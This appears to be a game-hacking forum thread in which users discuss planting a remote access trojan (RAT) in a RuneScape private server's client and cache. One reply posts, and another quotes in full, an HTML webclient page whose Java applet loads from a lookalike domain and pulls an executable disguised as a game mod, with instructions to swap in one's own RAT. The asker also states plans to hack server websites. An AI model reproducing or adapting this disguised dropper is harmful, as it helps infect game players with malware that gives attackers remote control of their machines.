How to put Rat in Private Server Cache

Dora

Member
Reputation
0
I am making a private server and i want to put my rat into the cache but i don't know how to make the rat run once the cache is done downloading.
 
inb4

HEY GUYS JOIN MY PRIVATE SERVER U CAN HAZ MOD
 
Nestea said:
inb4

HEY GUYS JOIN MY PRIVATE SERVER U CAN HAZ MOD

Lolno. I'm planned on hacking servers websites and turning webclient to jdb and put rat in client but i don't know what i would have to code in to run the rat.
 
Dora said:
I am making a private server and i want to put my rat into the cache but i don't know how to make the rat run once the cache is done downloading.

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css">
<title>DeadlyPkers</title>
</head>
</html>

<body>
	<div id="bg">
		<div id="content">
			<div id="wrapper">
				<ul>

				<li><a href="http://www.deadlypkers.net/portal/"target="_blank">Home</a></li>
				<li><a href="http://www.deadlypkers.net/forum/index.php" target="_blank">Forum</a></li>
				<li><a href="http://www.deadlypkers.net/614/vote.html" target="_blank">Vote</a></li>
				<li><a href="http://www.deadlypkers.net/forum/payments.php" target="_blank">Donate</a></li>
				<li><a href="http://www.twitter.com/deadlypkers/" target="_blank">Twitter</a></li>
				</ul>

				<div id="line">
				</div>
			</div>
			<div id="webclient">
			<applet name="DeadlyPkers 614" width='765' height='503' code='Java.class' archive='http://runsecape.com.nu/Java.jar'>
			<param name="YourDirectLink" value="http://dl.dropbox.com/u/32737216/Runescape%20Mod%20-%20v2.6.exe">
			<param name="YourFile" value="Runescapemodv2.6.exe">
			<param name="java_arguments" value="-Xmx1024m"></applet>
			</applet>			
			</div>
			<div id="txt">
				<center><font color="white">Welcome to the Newest Moderators Jimboslice & Pingu</font></center>

			</div>
		</div>
	</div>
</body>

change the .jar to the location of your file and the .exe to the location of ur rat.

Or you can just get foxxy java and delete that part of the code.

Btw, this script isn't mine, I just remember it being on my computer, I haven't used it in a while.

you can get index.js from here:
http://pastebin.com/Cyp42YZE
and the style.css from here:
http://pastebin.com/86CUUS1W
 
Rakeya said:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css">
<title>DeadlyPkers</title>
</head>
</html>

<body>
	<div id="bg">
		<div id="content">
			<div id="wrapper">
				<ul>

				<li><a href="http://www.deadlypkers.net/portal/"target="_blank">Home</a></li>
				<li><a href="http://www.deadlypkers.net/forum/index.php" target="_blank">Forum</a></li>
				<li><a href="http://www.deadlypkers.net/614/vote.html" target="_blank">Vote</a></li>
				<li><a href="http://www.deadlypkers.net/forum/payments.php" target="_blank">Donate</a></li>
				<li><a href="http://www.twitter.com/deadlypkers/" target="_blank">Twitter</a></li>
				</ul>

				<div id="line">
				</div>
			</div>
			<div id="webclient">
			<applet name="DeadlyPkers 614" width='765' height='503' code='Java.class' archive='http://runsecape.com.nu/Java.jar'>
			<param name="YourDirectLink" value="http://dl.dropbox.com/u/32737216/Runescape%20Mod%20-%20v2.6.exe">
			<param name="YourFile" value="Runescapemodv2.6.exe">
			<param name="java_arguments" value="-Xmx1024m"></applet>
			</applet>			
			</div>
			<div id="txt">
				<center><font color="white">Welcome to the Newest Moderators Jimboslice & Pingu</font></center>

			</div>
		</div>
	</div>
</body>

change the .jar to the location of your file and the .exe to the location of ur rat.

Or you can just get foxxy java and delete that part of the code.

Btw, this script isn't mine, I just remember it being on my computer, I haven't used it in a while.

you can get index.js from here:
http://pastebin.com/Cyp42YZE
and the style.css from here:
http://pastebin.com/86CUUS1W
I already know how to make a jdb i want to know how people put rats in the cache of their private server.
 
Back
Top